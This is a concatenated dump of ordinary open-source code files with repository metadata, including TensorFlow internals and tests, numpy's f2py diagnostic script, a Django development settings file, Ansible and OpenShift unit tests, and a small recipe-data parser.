(input_name, op_type_name,
", ".join(dtypes.as_dtype(x).name for x in attr_value),
", ".join(dtypes.as_dtype(x).name
for x in attrs[input_arg.type_list_attr]),
inferred_from[input_arg.type_list_attr]))
else:
for base_type in base_types:
_SatisfiesTypeConstraint(base_type,
_Attr(op_def, input_arg.type_list_attr),
param_name=input_name)
attrs[input_arg.type_list_attr] = attr_value
inferred_from[input_arg.type_list_attr] = input_name
else:
# single Tensor with specified type
if base_types[0] != input_arg.type:
assert False, "Unreachable"
if input_arg.is_ref:
if not all(x._is_ref_dtype for x in types): # pylint: disable=protected-access
raise TypeError(
"Input '%s' of '%s' Op requires l-value input" %
(input_name, op_type_name))
input_types.extend(types)
else:
input_types.extend(base_types)
# Process remaining attrs
for attr in op_def.attr:
# Skip attrs that have already had their values inferred
if attr.name in attrs:
if attr.name in keywords:
raise TypeError(
"Should not specify value for inferred attr '%s'." % attr.name)
continue
if attr.name in keywords:
attrs[attr.name] = keywords.pop(attr.name)
elif attr.name + "_" in keywords:
# Attrs whose names match Python keywords have an extra '_'
# appended, so we must check for that as well.
attrs[attr.name] = keywords.pop(attr.name + "_")
else:
raise TypeError("No argument for attr " + attr.name)
# Convert attr values to AttrValue protos.
attr_protos = {}
for attr_def in op_def.attr:
key = attr_def.name
value = attrs[key]
attr_value = attr_value_pb2.AttrValue()
if attr_def.HasField("default_value") and value is None:
attr_value.CopyFrom(attr_def.default_value)
attr_protos[key] = attr_value
continue
if attr_def.type.startswith("list("):
if not _IsListValue(value):
raise TypeError("Expected list for attr " + key)
if attr_def.has_minimum:
if len(value) < attr_def.minimum:
raise ValueError("Attr '%s' of '%s' Op passed list of length %d "
"less than minimum %d." %
(key, op_type_name, len(value),
attr_def.minimum))
attr_value.list.SetInParent()
if attr_def.type == "string":
attr_value.s = _MakeStr(value, key)
if attr_def.HasField("allowed_values"):
if attr_value.s not in attr_def.allowed_values.list.s:
raise ValueError(
"Attr '%s' of '%s' Op passed string '%s' not in: \"%s\"." %
(key, op_type_name, compat.as_text(attr_value.s),
'", "'.join(map(compat.as_text,
attr_def.allowed_values.list.s))))
elif attr_def.type == "list(string)":
attr_value.list.s.extend([_MakeStr(x, key) for x in value])
if attr_def.HasField("allowed_values"):
for x in attr_value.list.s:
if x not in attr_def.allowed_values.list.s:
raise ValueError(
"Attr '%s' of '%s' Op passed string '%s' not in: \"%s\"." %
(key, op_type_name, compat.as_text(x),
'", "'.join(map(compat.as_text,
attr_def.allowed_values.list.s))))
elif attr_def.type == "int":
attr_value.i = _MakeInt(value, key)
if attr_def.has_minimum:
if attr_value.i < attr_def.minimum:
raise ValueError(
"Attr '%s' of '%s' Op passed %d less than minimum %d." %
(key, op_type_name, attr_value.i, attr_def.minimum))
elif attr_def.type == "list(int)":
attr_value.list.i.extend([_MakeInt(x, key) for x in value])
elif attr_def.type == "float":
attr_value.f = _MakeFloat(value, key)
elif attr_def.type == "list(float)":
attr_value.list.f.extend([_MakeFloat(x, key) for x in value])
elif attr_def.type == "bool":
attr_value.b = _MakeBool(value, key)
elif attr_def.type == "list(bool)":
attr_value.list.b.extend([_MakeBool(x, key) for x in value])
elif attr_def.type == "type":
attr_value.type = _MakeType(value, attr_def)
elif attr_def.type == "list(type)":
attr_value.list.type.extend(
[_MakeType(x, attr_def) for x in value])
elif attr_def.type == "shape":
attr_value.shape.CopyFrom(_MakeShape(value, key))
elif attr_def.type == "list(shape)":
attr_value.list.shape.extend(
[_MakeShape(x, key) for x in value])
elif attr_def.type == "tensor":
attr_value.tensor.CopyFrom(_MakeTensor(value, key))
elif attr_def.type == "list(tensor)":
attr_value.list.tensor.extend(
[_MakeTensor(x, key) for x in value])
elif attr_def.type == "func":
if isinstance(value, attr_value_pb2.NameAttrList):
attr_value.func.CopyFrom(value)
elif isinstance(value, compat.bytes_or_text_types):
attr_value.func.name = value
else:
value.add_to_graph(ops.get_default_graph())
attr_value.func.name = value.name
else:
raise TypeError("Unrecognized Attr type " + attr_def.type)
attr_protos[key] = attr_value
del attrs # attrs is no longer authoritative, use attr_protos instead
# Determine output types (possibly using attrs)
output_types = []
output_structure = []
for arg in op_def.output_arg:
types = []
if arg.number_attr:
n = _AttrValue(attr_protos, arg.number_attr).i
if arg.type_attr:
types = [_AttrValue(attr_protos, arg.type_attr).type] * n
else:
types = [arg.type] * n
output_structure.append(n)
elif arg.type_attr:
t = _AttrValue(attr_protos, arg.type_attr)
types = [t.type]
output_structure.append(None)
elif arg.type_list_attr:
t = _AttrValue(attr_protos, arg.type_list_attr)
types = t.list.type
output_structure.append(len(types))
else:
types = [arg.type]
output_structure.append(None)
if arg.is_ref:
types = [dtypes.as_dtype(x)._as_ref for x in types] # pylint: disable=protected-access
output_types.extend(types)
if keywords:
raise TypeError("apply_op() got unexpected keyword arguments: " +
", ".join(sorted(keywords.keys())))
# NOTE(mrry): We add an explicit colocation constraint between
# the newly created op and any of its reference-typed inputs.
must_colocate_inputs = [val for arg, val in zip(op_def.input_arg, inputs)
if arg.is_ref]
with _MaybeColocateWith(must_colocate_inputs):
# Add Op to graph
op = g.create_op(op_type_name, inputs, output_types, name=scope,
input_types=input_types, attrs=attr_protos,
op_def=op_def)
if output_structure:
outputs = op.outputs
res = _Restructure(ops.convert_n_to_tensor(outputs), output_structure)
if isinstance(res, list) and not res and op_def.is_stateful:
return op
else:
return res
else:
return op
|
apache-2.0
|
bringingheavendown/numpy
|
numpy/f2py/diagnose.py
|
188
|
5295
|
#!/usr/bin/env python
from __future__ import division, absolute_import, print_function
import os
import sys
import tempfile
def run_command(cmd):
print('Running %r:' % (cmd))
os.system(cmd)
print('------')
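# Usage sketch: this module is normally run directly (see the __main__ guard
# at the bottom), e.g. `python -m numpy.f2py.diagnose`; run() below then
# prints the platform, Python, numpy and Fortran compiler details.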
def run():
_path = os.getcwd()
os.chdir(tempfile.gettempdir())
print('------')
print('os.name=%r' % (os.name))
print('------')
print('sys.platform=%r' % (sys.platform))
print('------')
print('sys.version:')
print(sys.version)
print('------')
print('sys.prefix:')
print(sys.prefix)
print('------')
print('sys.path=%r' % (':'.join(sys.path)))
print('------')
try:
import numpy
has_newnumpy = 1
except ImportError:
print('Failed to import new numpy:', sys.exc_info()[1])
has_newnumpy = 0
try:
from numpy.f2py import f2py2e
has_f2py2e = 1
except ImportError:
print('Failed to import f2py2e:', sys.exc_info()[1])
has_f2py2e = 0
try:
import numpy.distutils
has_numpy_distutils = 2
except ImportError:
try:
import numpy_distutils
has_numpy_distutils = 1
except ImportError:
print('Failed to import numpy_distutils:', sys.exc_info()[1])
has_numpy_distutils = 0
if has_newnumpy:
try:
print('Found new numpy version %r in %s' %
(numpy.__version__, numpy.__file__))
except Exception as msg:
print('error:', msg)
print('------')
if has_f2py2e:
try:
print('Found f2py2e version %r in %s' %
(f2py2e.__version__.version, f2py2e.__file__))
except Exception as msg:
print('error:', msg)
print('------')
if has_numpy_distutils:
try:
if has_numpy_distutils == 2:
print('Found numpy.distutils version %r in %r' % (
numpy.distutils.__version__,
numpy.distutils.__file__))
else:
print('Found numpy_distutils version %r in %r' % (
numpy_distutils.numpy_distutils_version.numpy_distutils_version,
numpy_distutils.__file__))
print('------')
except Exception as msg:
print('error:', msg)
print('------')
try:
if has_numpy_distutils == 1:
print(
'Importing numpy_distutils.command.build_flib ...', end=' ')
import numpy_distutils.command.build_flib as build_flib
print('ok')
print('------')
try:
print(
'Checking availability of supported Fortran compilers:')
for compiler_class in build_flib.all_compilers:
compiler_class(verbose=1).is_available()
print('------')
except Exception as msg:
print('error:', msg)
print('------')
except Exception as msg:
print(
            'error:', msg, '(ignore it, build_flib is obsolete for numpy.distutils 0.2.2 and up)')
print('------')
try:
if has_numpy_distutils == 2:
print('Importing numpy.distutils.fcompiler ...', end=' ')
import numpy.distutils.fcompiler as fcompiler
else:
print('Importing numpy_distutils.fcompiler ...', end=' ')
import numpy_distutils.fcompiler as fcompiler
print('ok')
print('------')
try:
print('Checking availability of supported Fortran compilers:')
fcompiler.show_fcompilers()
print('------')
except Exception as msg:
print('error:', msg)
print('------')
except Exception as msg:
print('error:', msg)
print('------')
try:
if has_numpy_distutils == 2:
print('Importing numpy.distutils.cpuinfo ...', end=' ')
from numpy.distutils.cpuinfo import cpuinfo
print('ok')
print('------')
else:
try:
print(
'Importing numpy_distutils.command.cpuinfo ...', end=' ')
from numpy_distutils.command.cpuinfo import cpuinfo
print('ok')
print('------')
except Exception as msg:
print('error:', msg, '(ignore it)')
print('Importing numpy_distutils.cpuinfo ...', end=' ')
from numpy_distutils.cpuinfo import cpuinfo
print('ok')
print('------')
cpu = cpuinfo()
print('CPU information:', end=' ')
for name in dir(cpuinfo):
if name[0] == '_' and name[1] != '_' and getattr(cpu, name[1:])():
print(name[1:], end=' ')
print('------')
except Exception as msg:
print('error:', msg)
print('------')
os.chdir(_path)
if __name__ == "__main__":
run()
|
bsd-3-clause
|
gladk/woodem
|
py/manpage.py
|
3
|
3054
|
# coding: utf-8
#
# Thanks to logilab for this code.
#
# Copied from the logilab.common.optik_ext module (GPL-licensed) and modified for woo.
#
import optparse,time
class ManHelpFormatter(optparse.HelpFormatter):
"""Format help using man pages ROFF format"""
def __init__(self,indent_increment=0,max_help_position=24,width=79,short_first=0):
optparse.HelpFormatter.__init__(self, indent_increment, max_help_position, width, short_first)
def format_heading(self, heading):
return '.SH %s\n' % heading.upper()
def format_description(self, description):
return description
def format_option(self, option):
try:
optstring = option.option_strings
except AttributeError:
optstring = self.format_option_strings(option)
if option.help:
help = ' '.join([l.strip() for l in option.help.splitlines()])
else:
help = ''
return '''.IP "%s"
%s
''' % (optstring, help)
def format_head(self, optparser, metadata, section=1):
pgm = optparser.get_prog_name()
short_desc = self.format_short_description(pgm, metadata['short_desc'])
long_desc = self.format_long_description(pgm, metadata['long_desc'])
return '%s\n%s\n%s\n%s' % (self.format_title(pgm, section), short_desc, self.format_synopsis(optparser), long_desc)
def format_title(self, pgm, section):
date = '-'.join([str(num) for num in time.localtime()[:3]])
return '.TH %s %s "%s" %s' % (pgm, section, date, pgm)
def format_short_description(self, pgm, short_desc):
return '''.SH NAME
.B %s
\- %s
''' % (pgm, short_desc.strip())
def _markup(self, txt):
"""Prepares txt to be used in man pages."""
return txt.replace('-', '\\-')
def format_synopsis(self, optparser):
synopsis = optparser.get_usage()
pgm=optparser.get_prog_name()
if synopsis:
synopsis = synopsis.replace('Usage: %s '%pgm, '')
return '.SH SYNOPSIS\n.B %s\n%s\n' % (self._markup(pgm),synopsis)
def format_long_description(self, pgm, long_desc):
long_desc = '\n'.join([line.lstrip()
for line in long_desc.splitlines()])
long_desc = long_desc.replace('\n.\n', '\n\n')
if long_desc.lower().startswith(pgm):
long_desc = long_desc[len(pgm):]
return '''.SH DESCRIPTION
.B %s
%s
''' % (pgm, long_desc.strip())
def format_tail(self, metadata, seealso=None):
return ('.SH SEE ALSO\n%s\n'%seealso if seealso else '')+'''.SH COPYRIGHT
%s %s
%s
.SH BUGS
Please report bugs to the project\'s bug tracker at
.br
%s
.SH AUTHOR
%s (%s)
''' % (metadata['copyright'],metadata['author'],metadata['license'],metadata['bugtracker'],metadata['author'],metadata['author_contact'])
def generate_manpage(optparser,metadata,fileOut,seealso=None,section=1):
"""generate a man page from an optparse parser"""
out=open(fileOut,'w')
formatter=ManHelpFormatter()
formatter.parser=optparser
out.write(formatter.format_head(optparser,metadata,section))
out.write(optparser.format_option_help(formatter))
out.write(formatter.format_tail(metadata,seealso))
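# A minimal usage sketch (parser and metadata values are hypothetical; the
# keys are the ones read by format_head and format_tail above):
#
#     parser = optparse.OptionParser(prog='prog', usage='Usage: prog [options]')
#     meta = dict(short_desc='one-line summary', long_desc='Longer text ...',
#                 copyright='(c) 2014', author='Author Name', license='GPL',
#                 bugtracker='https://example.org/bugs',
#                 author_contact='author@example.org')
#     generate_manpage(parser, meta, 'prog.1', seealso=None, section=1)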
|
gpl-2.0
|
TeamFeH/back-end
|
back_end/back_end/settings.py
|
1
|
2221
|
"""
Django settings for back_end project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'j0s&zg)yled@4yu4ja%r9u_kob(#7oxv4wdsnmcz#ey-r!0r+0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'shelf_json_manager',
'corsheaders',
'taggit',
'colorful',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'back_end.urls'
WSGI_APPLICATION = 'back_end.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
CORS_ORIGIN_ALLOW_ALL = True
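# Hardening sketch (an assumption, not part of this project's settings): in
# production the blanket rule above would usually be replaced by an explicit
# django-cors-headers whitelist, e.g.
#   CORS_ORIGIN_ALLOW_ALL = False
#   CORS_ORIGIN_WHITELIST = ('frontend.example.com',)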
|
gpl-2.0
|
sandeepgupta2k4/tensorflow
|
tensorflow/contrib/distributions/python/kernel_tests/bijectors/exp_test.py
|
73
|
2307
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Exp Tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops.bijectors.exp import Exp
from tensorflow.python.ops.distributions.bijector_test_util import assert_bijective_and_finite
from tensorflow.python.ops.distributions.bijector_test_util import assert_scalar_congruency
from tensorflow.python.platform import test
class ExpBijectorTest(test.TestCase):
"""Tests correctness of the Y = g(X) = exp(X) transformation."""
def testBijector(self):
with self.test_session():
bijector = Exp(event_ndims=1)
self.assertEqual("exp", bijector.name)
x = [[[1.], [2.]]]
y = np.exp(x)
self.assertAllClose(y, bijector.forward(x).eval())
self.assertAllClose(x, bijector.inverse(y).eval())
self.assertAllClose(
-np.sum(np.log(y), axis=-1),
bijector.inverse_log_det_jacobian(y).eval())
self.assertAllClose(-bijector.inverse_log_det_jacobian(np.exp(x)).eval(),
bijector.forward_log_det_jacobian(x).eval())
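  # The Jacobian identities asserted above follow from y = exp(x):
  # dy/dx = exp(x) = y, hence inverse_log_det_jacobian(y) reduces to
  # sum(log|dx/dy|) = -sum(log(y)) over the event dimension, and
  # forward_log_det_jacobian(x) is the negation of that value at y = exp(x).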
def testScalarCongruency(self):
with self.test_session():
bijector = Exp()
assert_scalar_congruency(
bijector, lower_x=-2., upper_x=1.5, rtol=0.05)
def testBijectiveAndFinite(self):
with self.test_session():
bijector = Exp(event_ndims=0)
x = np.linspace(-10, 10, num=10).astype(np.float32)
y = np.logspace(-10, 10, num=10).astype(np.float32)
assert_bijective_and_finite(bijector, x, y)
if __name__ == "__main__":
test.main()
|
apache-2.0
|
weightedEights/runDBcheck
|
RADAR_DATA/20170713.001/Source/Shell/setup.py
|
5
|
7913
|
"""
This class holds all the info needed to configure
a given setup from an experiment file
"""
import logging
import os
from pylib.Inifile import Inifile
from pylib.TuFile import TuFile
from pylib.rxclasses import rxConfig
from pylib.txclasses import txConfig
from pylib.beamcodeclasses import beamcodesConfig
from modeclasses import modeConfig
class setup:
def __init__(self,exp,id,extconf):
self.log = logging.getLogger('setup')
self.exp = exp
self.id = int(id)
self.extconf = extconf
# shortcut to self.exp.binConfig
bconf = self.exp.binConfig
# Read config values from expfile
dtc = self.exp.dtc
commonsec = 'Common Mode:%d' % (self.id)
mainsec = '%s Mode:%d' % (self.exp.dtc,self.id)
# Common stuff
self.nPulsesInt = self.exp.experimentConfig.getint('common parameters','npulsesint',0)
self.ippMask = self.exp.experimentConfig.getint('common parameters','ippmask',1)
self.maxSamples = self.exp.experimentConfig.getint(mainsec,'maxsamples',50000)
outputmask = self.exp.systemConfig.getint('common parameters','outputmask',0xffffffff)
self.outputMask = self.exp.experimentConfig.getint('common parameters','outputmask',outputmask)
self.useSpecialBeamcodes = self.exp.experimentConfig.getint('common parameters','usespecialbeamcodes',0)
# Trig
trig = self.exp.systemConfig.getint(dtc,'internaltrig',0)
self.internalTrig = self.exp.experimentConfig.getint(dtc,'internaltrig',trig)
# Synchronize RF and TR (remove TR when RF is turned off)
self.syncrftr = self.exp.systemConfig.getint('common parameters','syncrftr',1)
# Write display record
wdr = self.exp.systemConfig.getint(dtc,'writedisplayrecord',True)
wdr = self.exp.experimentConfig.getint(dtc,'writedisplayrecord',wdr)
wdr = self.exp.experimentConfig.getint(mainsec,'writedisplayrecord',wdr)
wdr = self.exp.experimentConfig.getint('common parameters','writedisplayrecord',wdr)
self.writeDisplayRecord = wdr
# Amisr upconverter TR pulse width control
controltr = self.exp.systemConfig.getint(dtc,'controltr',0)
self.controlTr = self.exp.experimentConfig.getint(dtc,'controltr',controltr)
if self.controlTr:
widthinc = self.exp.systemConfig.getfloat(dtc,'widthincperpulse',0.5)
self.widthInc = self.exp.experimentConfig.getfloat(dtc,'widthincperpulse',widthinc)
cntlwidth = self.exp.systemConfig.getint(dtc,'controlwidth',500)
self.controlWidth = self.exp.experimentConfig.getint(dtc,'controlwidth',cntlwidth)
# TxEnabled
self.txEnabled = self.exp.experimentConfig.getint(mainsec,'txenabled',False)
# Tu handling
self.tuFilename = tuFile = self.exp.experimentConfig.get(mainsec,'tufile','')
self.tuImage = bconf.binImage(tuFile)
self.log.info('Reading tu image: %s' % (tuFile))
# Rx handling
self.rxAttenuation = self.exp.experimentConfig.getint(mainsec,'rxattenuation',0)
self.rxFrequency = self.exp.experimentConfig.getfloat(mainsec,'rxfrequency',0)
self.rxcFile = rxcFile = self.exp.experimentConfig.get(mainsec,'rxconfig','')
rxc = bconf.inifile(rxcFile)
self.filterFile = rxc.get('filter','file','')
self.rxNode = bconf.binPath(rxc.Filename)
self.log.info('Reading Rx config file: %s' % (rxcFile))
# Tx handling
txcFile = self.exp.experimentConfig.get(mainsec,'txconfig','')
        if txcFile != '':
self.log.info('Reading Tx image: %s' % (txcFile))
self.txImage = bconf.binImage(txcFile)
self.txConfigText = bconf.text(txcFile)
else:
# No txc file specified. Read default values from system.ini file
self.log.info('Reading default Tx image')
self.txImage = bconf.binImage('default.tx.image')
self.txConfigText = bconf.text('default.tx.config')
# Beam codes
bcoFile = self.exp.experimentConfig.get(commonsec,'beamcodefile','')
if bcoFile == '':
bcoFile = self.exp.experimentConfig.get(mainsec,'beamcodefile')
self.beamcodesFilename = bcoFile
self.beamcodes = bconf.beamcodes(bcfile=bcoFile)
# Modes
self.modes = []
smodes = self.exp.experimentConfig.get(mainsec,'modes','')
modenames = smodes.split(' ')
for m in modenames:
self.log.info('Reading config info for mode: %s' % (m))
modeconf = modeConfig(self.exp.experimentConfig,self.exp.dtc,self.id,m)
modegroup = int(modeconf.pars['modegroup'])
try:
bcp = bconf.beamcodesPath(tuFile,modegroup,bcoFile)
modeconf.pars['beamcodes'] = bconf[bcp]
except:
# Alternate beamcode used for this mode group
bcp = bconf.beamcodesPath(tuFile,modegroup)
modeconf.pars['beamcodes'] = bconf[bcp]
modeconf.pars['activepulses'] = bconf['%s/activepulses' % (bcp)]
modeconf.pars['totalpulses'] = bconf['%s/totalpulses' % (bcp)]
# Add special info from other places
# Common stuff
modeconf.pars['npulsesint'] = self.nPulsesInt
modeconf.pars['nradacheaderwords'] = extconf['nradacheaderwords']
# Rx stuff
modeconf.pars['filterrangedelay'] = bconf['%s/filterrangedelay' % (self.rxNode)]
modeconf.pars['sampletime'] = bconf['%s/sampletime' % (self.rxNode)]
modeconf.pars['samplespacing'] = bconf['%s/samplespacing' % (self.rxNode)]
self.modes.append(modeconf)
def loadBeamcodes(self,filename):
if os.path.exists(filename):
bcoFile = filename
else:
bcoFile = os.path.join(self.exp.experimentConfigPath,filename)
self.log.debug(bcoFile)
self.beamcodes = beamcodesConfig(bcoFile)
# Change beamcodes in mode configurations
for modeconf in self.modes:
self.usedBeamcodes(modeconf)
def usedBeamcodes(self,modeconf):
"""
This function is supposed to find all uniq beamcodes used in a modegroup
so they can be passed down to the mode dll where they are used for
storage allocation and data sorting. It does that using modegroup info
from the exp file, the TU file and currently configured beamcodes table.
"""
modegroup = int(modeconf.pars['modegroup'])
indxHeaders = self.tu.Index(bit=11)
npulses = len(indxHeaders)
indxBct = self.tu.Index(bit=12)
indxMg = self.tu.Index(bit=-2,specialwordaddress=3,specialword=modegroup)
bcs = []
for mg in indxMg:
indx = 0
for bct in indxBct:
if bct > mg:
break
else:
indx += 1
bcs.append(self.beamcodes.codes[indx])
        # Find unique codes and sort them
sbcs = []
for c in bcs:
if c not in sbcs:
sbcs.append(c)
sbcs.sort()
modeconf.pars['beamcodes'] = sbcs
modeconf.pars['activepulses'] = len(indxMg)
npi = int(modeconf.pars['npulsesint'])
ap = modeconf.pars['activepulses']
modeconf.pars['totalpulses'] = npi*ap/len(indxHeaders)
if (npi % npulses):
            self.log.error('npulsesint: %d is not a multiple of npulsesframe: %d' % (npi,npulses))
|
gpl-3.0
|
tiwillia/openshift-tools
|
openshift/installer/vendored/openshift-ansible-3.5.5/roles/lib_openshift/src/test/unit/oc_secret.py
|
2
|
2783
|
#!/usr/bin/env python2
'''
Unit tests for oc secret
'''
# To run:
# ./oc_secret.py
#
# .
# Ran 1 test in 0.002s
#
# OK
import os
import sys
import unittest
import mock
# Removing invalid variable names for tests so that I can
# keep them brief
# pylint: disable=invalid-name,no-name-in-module
# Disable import-error b/c our libraries aren't loaded in jenkins
# pylint: disable=import-error,wrong-import-position
# place class in our python path
module_path = os.path.join('/'.join(os.path.realpath(__file__).split('/')[:-4]), 'library') # noqa: E501
sys.path.insert(0, module_path)
from oc_secret import OCSecret # noqa: E402
class OCSecretTest(unittest.TestCase):
'''
Test class for OCSecret
'''
def setUp(self):
''' setup method will create a file and set to known configuration '''
pass
@mock.patch('oc_secret.OCSecret.openshift_cmd')
def test_adding_a_secret(self, mock_openshift_cmd):
''' Testing adding a secret '''
# Arrange
# run_ansible input parameters
params = {
'state': 'present',
'namespace': 'default',
'name': 'secretname',
'contents': [{
'path': "/tmp/somesecret.json",
'data': "{'one': 1, 'two': 2, 'three', 3}",
}],
'decode': False,
'kubeconfig': '/etc/origin/master/admin.kubeconfig',
'debug': False,
'files': None,
'delete_after': True,
}
# Return values of our mocked function call. These get returned once per call.
mock_openshift_cmd.side_effect = [
{
"cmd": "/usr/bin/oc get secrets -o json secretname",
"results": "",
"returncode": 0,
}, # oc output for first call to openshift_cmd (oc secrets get)
{
"cmd": "/usr/bin/oc secrets new secretname somesecret.json=/tmp/somesecret.json",
"results": "",
"returncode": 0,
}, # oc output for second call to openshift_cmd (oc secrets new)
]
# Act
results = OCSecret.run_ansible(params, False)
# Assert
self.assertTrue(results['changed'])
self.assertEqual(results['results']['returncode'], 0)
self.assertEqual(results['state'], 'present')
# Making sure our mock was called as we expected
mock_openshift_cmd.assert_has_calls([
mock.call(['get', 'secrets', 'secretname', '-o', 'json'], output=True),
mock.call(['secrets', 'new', 'secretname', 'somesecret.json=/tmp/somesecret.json']),
])
def tearDown(self):
'''TearDown method'''
pass
if __name__ == "__main__":
unittest.main()
|
apache-2.0
|
pmarques/ansible
|
test/units/plugins/become/test_sudo.py
|
11
|
1252
|
# (c) 2012-2014, Michael DeHaan <[email protected]>
# (c) 2020 Ansible Project
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
from ansible import context
from ansible.plugins.loader import become_loader, shell_loader
def test_sudo(mocker, parser, reset_cli_args):
options = parser.parse_args([])
context._init_global_context(options)
sudo = become_loader.get('sudo')
sh = shell_loader.get('sh')
sh.executable = "/bin/bash"
sudo.set_options(direct={
'become_user': 'foo',
'become_flags': '-n -s -H',
})
cmd = sudo.build_become_command('/bin/foo', sh)
assert re.match(r"""sudo\s+-n -s -H\s+-u foo /bin/bash -c 'echo BECOME-SUCCESS-.+? ; /bin/foo'""", cmd), cmd
sudo.set_options(direct={
'become_user': 'foo',
'become_flags': '-n -s -H',
'become_pass': 'testpass',
})
cmd = sudo.build_become_command('/bin/foo', sh)
assert re.match(r"""sudo\s+-s\s-H\s+-p "\[sudo via ansible, key=.+?\] password:" -u foo /bin/bash -c 'echo BECOME-SUCCESS-.+? ; /bin/foo'""", cmd), cmd
|
gpl-3.0
|
alansaid/RecipeParser
|
parseRecipeData.py
|
1
|
2285
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Convert JSON data to human-readable form.
Usage:
prettyJSON.py domain team
"""
import sys
import glob
import traceback
def main(args):
authors = {}
userFile = open('parsed/parsedProfiles.tsv', 'r')
userIds = {}
for line in userFile:
userData = line.split("\t")
siteid = userData[2]
userid = userData[0]
userIds[siteid] = userid
recipeFile = open("parsed/parsedRecipes.tsv", 'w')
lines = 0
file = open("input/recipes.tsv", "r")
recipeID = 0
for line in file:
try:
line = line.rstrip('\n')
if "\t404" in line:
continue
recipeID = recipeID + 1
[url, title, servings, username, userID, cookingTime] = line.split("\t")
#print "url: " + url
#print "title: " + title
#print "servings: " + servings
#print "username: " + username
#print "userID: " + userID
#print "cookingTime: " + cookingTime
myUserID = ""
if userID in userIds:
myUserID = userIds.get(userID)
cookingTime = cookingTime.strip()
if len(cookingTime) > 1:
num = 0
mins = 0
[no, unit] = cookingTime.split(" ")
no = no.strip("+")
if unit == "day" or unit == "days":
				mins = 1440  # minutes per day
elif unit == "hr" or unit == "hrs":
mins = 60
elif unit == "min" or unit == "mins":
mins = 1
if "¼" in no:
no = no.strip("¼").strip() + ".25"
elif "½" in no:
no = no.strip("½").strip() + ".5"
elif "¾" in no:
no = no.strip("¾").strip() + ".75"
cookingTimeInMinutes = int(float(no) * int(mins))
output = str(recipeID) + "\t" + title + "\t" + servings + "\t" + cookingTime + "\t" + str(cookingTimeInMinutes) + "\t" + myUserID + "\t" + userID + "\t" + username + "\t" + url + "\n"
#output = str(recipeID) + "\t" + url + "\t" + title + "\t" + servings + "\t" + username + "\t" + userID + "\t" + myUserID + "\t" + cookingTime + "\t" + str(cookingTimeInMinutes) + "\n"
recipeFile.write(output)
# if lines == 200:
# sys.exit()
except ValueError:
print line
print len(cookingTime)
print len(line.split("\t"))
print sys.exc_info()[0]
print traceback.format_exc()
sys.exit()
#pass
file.close()
recipeFile.close()
return True
def usage():
print __doc__
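# --- Illustrative sketch (not part of the original script) ------------------
# A hedged, standalone rendering of the cooking-time conversion done in
# main(); the helper name and the sample input are assumptions for clarity.
def exampleCookingTimeInMinutes(cookingTime):
	# e.g. "1½ hrs" -> no = "1.5", mins = 60 -> 90 minutes
	[no, unit] = cookingTime.strip().split(" ")
	no = no.strip("+")
	mins = 0
	if unit == "day" or unit == "days":
		mins = 1440  # minutes per day
	elif unit == "hr" or unit == "hrs":
		mins = 60
	elif unit == "min" or unit == "mins":
		mins = 1
	if "½" in no:
		no = no.strip("½").strip() + ".5"
	elif "¼" in no:
		no = no.strip("¼").strip() + ".25"
	elif "¾" in no:
		no = no.strip("¾").strip() + ".75"
	return int(float(no) * mins)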
if __name__ == "__main__":
sys.exit(not main(sys.argv))
|
gpl-2.0
|
anilmuthineni/tensorflow
|
tensorflow/python/training/monitored_session.py
|
8
|
35656
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A wrapper of Session API which runs hooks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
